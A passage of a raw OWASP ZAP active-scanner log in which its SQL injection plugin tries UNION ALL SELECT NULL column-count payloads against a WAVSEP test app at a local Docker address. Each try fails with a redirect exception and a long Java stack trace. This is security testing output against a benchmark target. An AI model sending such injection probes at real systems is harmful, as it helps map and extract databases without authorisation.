org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682207 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682208 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682209 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682210 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682210 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682211 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682212 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682212 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682213 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682213 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682214 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682215 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682215 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at 